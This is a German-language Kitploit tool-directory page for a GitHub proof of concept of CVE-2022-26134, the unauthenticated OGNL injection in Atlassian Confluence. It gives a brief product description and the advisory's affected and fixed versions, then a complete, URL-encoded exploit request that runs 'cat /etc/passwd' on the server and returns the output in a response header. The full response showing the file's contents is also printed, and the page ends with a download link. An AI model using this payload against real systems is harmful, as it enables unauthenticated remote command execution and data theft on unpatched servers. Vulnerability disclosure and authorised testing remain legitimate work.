Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-26134 — [CVE-2022-26134] Confluence Pre-Auth Object-Graph Navigation Language (OGNL) Injection | Kitploit
Tools/GitHubGitHub/murataydemir/cve-2022-26134
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubmurataydemir/cve-2022-26134

CVE-2022-26134

[CVE-2022-26134] Confluence Pre-Auth Object-Graph Navigation Language (OGNL) Injection

Repository anzeigen
138vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

[CVE-2022-26134] Confluence Pre-Auth Object-Graph Navigation Language (OGNL)-Injektion


Confluence ist ein webbasiertes Kollaborationsprodukt für Arbeitsbereiche, das von Atlassian entwickelt wird. Es kann lokal (on-prem) oder als Teil von Atlassian Cloud bereitgestellt werden. Es besteht aus drei Hauptfunktionen: Seite, Space (Bereich) und Seitenbaum.

  • Seite: Ihre Inhalte leben in Seiten – lebende Dokumente, die Sie auf Ihrer Confluence-Site erstellen. Sie können Seiten für fast alles erstellen, von Projektplänen über Besprechungsnotizen, Fehlerbehebungsanleitungen, Richtlinien und mehr.
  • Space: Seiten werden in Spaces gespeichert – Arbeitsbereichen, in denen Sie zusammenarbeiten und alle Ihre Inhalte organisiert halten können.
  • Seitenbaum: Organisieren Sie Space-Inhalte mit einem hierarchischen Seitenbaum, der das Auffinden von Arbeiten schnell und einfach macht. Verschachteln Sie Seiten unter zugehörigen Spaces und Seiten, um Seiten nahezu beliebig zu organisieren.

Am 02.06.2022 um 20:00 UTC hat Atlassian ein Sicherheitsadvisory veröffentlicht, das sich auf eine Schwachstelle zur Remote-Codeausführung (RCE) bezieht, die Confluence Server und Confluence Data Center Produkte betrifft. Detaillierte Informationen zur CVE-2022-26134-Schwachstelle finden Sie weiter unten.

Zusammenfassung: CVE-2022-26134 – Kritische Schwachstelle für nicht authentifizierte Remote-Codeausführung in Confluence Server und Data Center
Veröffentlichungsdatum des Advisories: 02. Juni 2022
Betroffene Produkte: Confluence Server und Confluence Data Center
Betroffene Versionen: Alle unterstützten Versionen von Confluence Server und Data Center sind betroffen. Confluence Server- und Data Center-Versionen nach 1.3.0 sind betroffen.
Behobene Versionen: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 und 7.18.1
CVE-ID(s): CVE-2022-26134 Confluence Pre-Auth Object-Graph Navigation Language (OGNL)-Injektion

Proof of Concept: Beispielanfrage 1

GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20/etc/passwd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Murat%22%2C%23a%29%29%7D/ HTTP/1.1
Host: vulnerablehost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

Antwort 1

HTTP/1.1 302 
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1654688652451
Set-Cookie: JSESSIONID=47E8CE261CF7355A5625FEF65B4BD7DC; Path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-Cmd-Murat: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin confluence:x:2002:2002::/var/atlassian/application-data/confluence:/bin/bash 
Location: /login.action?os_destination=%2F%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat+%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Murat%22%2C%23a%29%29%7D%2Findex.action&permissionViolation=true
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Wed, 08 Jun 2022 11:44:12 GMT
Connection: close

PoC-1

Tool herunterladen